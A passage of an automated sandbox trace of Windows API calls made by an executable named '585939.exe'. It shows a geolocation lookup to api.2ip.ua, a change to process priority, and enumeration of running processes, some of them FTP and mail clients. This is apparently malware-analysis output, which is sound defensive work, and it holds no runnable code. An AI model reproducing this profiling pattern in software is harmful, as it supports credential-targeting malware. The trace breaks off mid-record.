lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0097.548] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691460) returned 0x94 [0097.548] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691460, Size=0x98) returned 0x691460 [0097.602] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x690e20) returned 0x80 [0097.603] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x690e20) returned 0x80 [0097.603] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x690e20) returned 0x80 [0097.611] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x8ec) returned 0x691500 [0097.668] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x690e20) returned 0x80 [0097.668] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x10) returned 0x68e688 [0097.669] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x690e20) returned 0x80 [0097.669] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x690e20) returned 0x80 [0097.669] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x690e20) returned 0x80 [0097.706] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x690e20) returned 0x80 [0097.714] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0099.914] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x40) returned 0x685ae8 [0099.920] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0114.633] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18afd8, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18d7d8 | out: lpBuffer=0x18afd8*, lpdwNumberOfBytesRead=0x18d7d8*=0x1d0) returned 1 [0114.635] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0114.639] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0114.647] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20) returned 0x69c490 [0114.665] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x1e0) returned 0x32b8dc0 [0114.674] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x32b8dc0 | out: hHeap=0x670000) returned 1 [0114.683] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x69c490 | out: hHeap=0x670000) returned 1 [0114.683] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x685ae8 | out: hHeap=0x670000) returned 1 [0114.692] GetCurrentProcess () returned 0xffffffff [0114.692] GetLastError () returned 0x2 [0114.692] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0114.721] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x10) returned 0x6c1c58 [0114.730] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x8ec) returned 0x3280b18 [0114.739] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x800) returned 0x3286c40 [0114.739] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3286c40, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\585939.exe")) returned 0x30 [0114.739] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0114.748] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x810) returned 0x3287448 [0114.748] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe\" " [0114.748] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe\" ", pNumArgs=0x18d8b8 | out: pNumArgs=0x18d8b8) returned 0x329ed60*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe" [0114.748] lstrcpyW (in: lpString1=0x18e548, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe" [0114.757] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe\" " [0114.757] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe\" ", pNumArgs=0x18d854 | out: pNumArgs=0x18d854) returned 0x329ed60*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe" [0114.805] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe") returned="585939.exe" [0114.805] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0114.806] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcesses") returned 0x0 [0114.807] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcessModules") returned 0x0 [0114.807] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleBaseNameW") returned 0x0 [0114.807] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x77060000 [0114.811] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcesses") returned 0x77061544 [0114.811] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcessModules") returned 0x77061408 [0114.811] GetProcAddress (hModule=0x77060000, lpProcName="GetModuleBaseNameW") returned 0x7706152c [0114.811] EnumProcesses (in: lpidProcess=0x183050, cb=0xa000, lpcbNeeded=0x18d860 | out: lpidProcess=0x183050, lpcbNeeded=0x18d860) returned 1 [0114.817] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0114.817] CloseHandle (hObject=0x0) returned 0 [0114.817] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0114.817] CloseHandle (hObject=0x0) returned 0 [0114.817] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0114.817] CloseHandle (hObject=0x0) returned 0 [0114.817] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0114.817] CloseHandle (hObject=0x0) returned 0 [0114.817] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0114.817] CloseHandle (hObject=0x0) returned 0 [0114.817] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0114.817] CloseHandle (hObject=0x0) returned 0 [0114.817] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0114.817] CloseHandle (hObject=0x0) returned 0 [0114.817] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0114.817] CloseHandle (hObject=0x0) returned 0 [0114.817] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0114.818] CloseHandle (hObject=0x0) returned 0 [0114.818] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0114.818] CloseHandle (hObject=0x0) returned 0 [0114.818] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0114.818] CloseHandle (hObject=0x0) returned 0 [0114.818] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0114.818] CloseHandle (hObject=0x0) returned 0 [0114.818] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0114.818] CloseHandle (hObject=0x0) returned 0 [0114.818] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0 [0114.818] CloseHandle (hObject=0x0) returned 0 [0114.818] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0114.818] CloseHandle (hObject=0x0) returned 0 [0114.818] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0114.819] CloseHandle (hObject=0x0) returned 0 [0114.819] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc8) returned 0x0 [0114.819] CloseHandle (hObject=0x0) returned 0 [0114.819] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x11c) returned 0x0 [0114.819] CloseHandle (hObject=0x0) returned 0 [0114.819] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x444) returned 0x5b8 [0114.819] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 0 [0114.819] CloseHandle (hObject=0x5b8) returned 1 [0114.819] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x454) returned 0x5b8 [0114.819] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 0 [0114.819] CloseHandle (hObject=0x5b8) returned 1 [0114.819] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x47c) returned 0x0 [0114.819] CloseHandle (hObject=0x0) returned 0 [0114.820] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4bc) returned 0x0 [0114.820] CloseHandle (hObject=0x0) returned 0 [0114.820] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5b8 [0114.820] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 0 [0114.821] CloseHandle (hObject=0x5b8) returned 1 [0114.821] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x588) returned 0x5b8 [0114.821] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 0 [0114.821] CloseHandle (hObject=0x5b8) returned 1 [0114.821] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6a4) returned 0x5b8 [0114.821] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.822] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x8c0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="dressing.exe") returned 0xc [0114.823] CloseHandle (hObject=0x5b8) returned 1 [0114.823] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x730) returned 0x5b8 [0114.823] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.824] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x350000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="marathonruntimegrows.exe") returned 0x18 [0114.824] CloseHandle (hObject=0x5b8) returned 1 [0114.824] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x78c) returned 0x5b8 [0114.824] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.826] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1380000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="respondent savings.exe") returned 0x16 [0114.826] CloseHandle (hObject=0x5b8) returned 1 [0114.826] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x60c) returned 0x5b8 [0114.826] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.828] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1290000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="agreed.exe") returned 0xa [0114.828] CloseHandle (hObject=0x5b8) returned 1 [0114.828] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x20c) returned 0x5b8 [0114.828] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.829] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x20000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="accomplished environment.exe") returned 0x1c [0114.830] CloseHandle (hObject=0x5b8) returned 1 [0114.830] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x244) returned 0x5b8 [0114.830] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.831] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xd30000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="safe.exe") returned 0x8 [0114.831] CloseHandle (hObject=0x5b8) returned 1 [0114.831] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x364) returned 0x5b8 [0114.832] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.833] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x2b0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="ri-get-abstracts.exe") returned 0x14 [0114.833] CloseHandle (hObject=0x5b8) returned 1 [0114.833] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7d4) returned 0x5b8 [0114.833] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.835] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xa10000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="departurepmct.exe") returned 0x11 [0114.835] CloseHandle (hObject=0x5b8) returned 1 [0114.835] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5ac) returned 0x5b8 [0114.835] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.836] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xca0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="ellis.exe") returned 0x9 [0114.837] CloseHandle (hObject=0x5b8) returned 1 [0114.837] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x248) returned 0x5b8 [0114.837] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.838] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x910000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="infrared partial.exe") returned 0x14 [0114.838] CloseHandle (hObject=0x5b8) returned 1 [0114.839] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x704) returned 0x5b8 [0114.839] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.840] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1250000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="clusters_stainless_subsidiary.exe") returned 0x21 [0114.840] CloseHandle (hObject=0x5b8) returned 1 [0114.840] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3f8) returned 0x5b8 [0114.840] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.842] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1380000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="firefox-definition.exe") returned 0x16 [0114.842] CloseHandle (hObject=0x5b8) returned 1 [0114.842] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x754) returned 0x5b8 [0114.842] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.843] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x180000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="intensity-becoming.exe") returned 0x16 [0114.844] CloseHandle (hObject=0x5b8) returned 1 [0114.844] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6a8) returned 0x5b8 [0114.844] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.845] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1330000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="has.exe") returned 0x7 [0114.845] CloseHandle (hObject=0x5b8) returned 1 [0114.845] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4fc) returned 0x5b8 [0114.846] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.847] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xd80000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="oorope.exe") returned 0xa [0114.847] CloseHandle (hObject=0x5b8) returned 1 [0114.847] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x414) returned 0x5b8 [0114.847] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.849] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1350000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="exchanges command.exe") returned 0x15 [0114.849] CloseHandle (hObject=0x5b8) returned 1 [0114.849] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x25c) returned 0x5b8 [0114.849] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.850] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x11c0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="visual_minneapolis.exe") returned 0x16 [0114.851] CloseHandle (hObject=0x5b8) returned 1 [0114.851] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4e4) returned 0x5b8 [0114.851] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.853] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1270000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="3dftp.exe") returned 0x9 [0114.854] CloseHandle (hObject=0x5b8) returned 1 [0114.854] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5a8) returned 0x5b8 [0114.854] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.855] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1020000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0114.855] CloseHandle (hObject=0x5b8) returned 1 [0114.855] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5b8 [0114.855] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.857] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x140000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="alftp.exe") returned 0x9 [0114.857] CloseHandle (hObject=0x5b8) returned 1 [0114.857] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5dc) returned 0x5b8 [0114.857] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.858] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1290000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="barca.exe") returned 0x9 [0114.859] CloseHandle (hObject=0x5b8) returned 1 [0114.859] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x598) returned 0x5b8 [0114.859] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.860] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1190000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="bitkinex.exe") returned 0xc [0114.861] CloseHandle (hObject=0x5b8) returned 1 [0114.861] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x644) returned 0x5b8 [0114.861] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.862] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xc20000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="coreftp.exe") returned 0xb [0114.863] CloseHandle (hObject=0x5b8) returned 1 [0114.863] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x600) returned 0x5b8 [0114.863] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.864] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x20000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="far.exe") returned 0x7 [0114.865] CloseHandle (hObject=0x5b8) returned 1 [0114.865] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x71c) returned 0x5b8 [0114.865] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.866] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1190000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="filezilla.exe") returned 0xd [0114.866] CloseHandle (hObject=0x5b8) returned 1 [0114.866] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c4) returned 0x5b8 [0114.866] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.868] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xf10000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="flashfxp.exe") returned 0xc [0114.868] CloseHandle (hObject=0x5b8) returned 1 [0114.868] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x174) returned 0x5b8 [0114.868] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.869] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x9a0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="fling.exe") returned 0x9 [0114.870] CloseHandle (hObject=0x5b8) returned 1 [0114.870] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x694) returned 0x5b8 [0114.870] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.871] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xda0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0114.872] CloseHandle (hObject=0x5b8) returned 1 [0114.872] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x524) returned 0x5b8 [0114.872] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.873] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x890000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0114.873] CloseHandle (hObject=0x5b8) returned 1 [0114.873] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x410) returned 0x5b8 [0114.873] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.875] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xc10000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="icq.exe") returned 0x7 [0114.875] CloseHandle (hObject=0x5b8) returned 1 [0114.875] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7bc) returned 0x5b8 [0114.875] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.877] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xf30000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="leechftp.exe") returned 0xc [0114.877] CloseHandle (hObject=0x5b8) returned 1 [0114.877] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x76c) returned 0x5b8 [0114.877] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.878] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1150000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="ncftp.exe") returned 0x9 [0114.879] CloseHandle (hObject=0x5b8) returned 1 [0114.879] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x124) returned 0x5b8 [0114.879] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.880] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xca0000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="notepad.exe") returned 0xb [0114.881] CloseHandle (hObject=0x5b8) returned 1 [0114.881] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x318) returned 0x5b8 [0114.881] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.882] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x130000, lpBaseName=0x18d050, nSize=0x400 | out: lpBaseName="operamail.exe") returned 0xd [0114.882] CloseHandle (hObject=0x5b8) returned 1 [0114.882] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x810) returned 0x5b8 [0114.883] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d86c, cb=0x4, lpcbNeeded=0x18d850 | out: lphModule=0x18d86c, lpcbNeeded=0x18d850) returned 1 [0114.884] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x2b0000, lpBaseName=0x18d050, nSize=0x400 | 